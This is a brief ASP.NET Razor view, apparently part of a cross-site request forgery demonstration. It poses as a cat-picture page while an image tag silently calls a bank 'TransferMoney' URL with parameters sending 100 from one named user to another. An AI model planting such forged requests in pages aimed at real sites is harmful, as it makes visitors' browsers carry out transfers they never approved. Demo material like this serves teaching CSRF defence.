@{
    ViewBag.Title = "GetForgeryPage";
    var bankUrl = System.Web.Configuration.WebConfigurationManager.AppSettings["GoodUrl"] + "/Bank/TransferMoney";
    var bankUrlWithNefariousParams = bankUrl + "?from=srkirkland&to=tsoprano&amount=100";
}

<h2>Look at this awesome page!</h2>

[Pictures of cats]

<img src="@bankUrlWithNefariousParams" />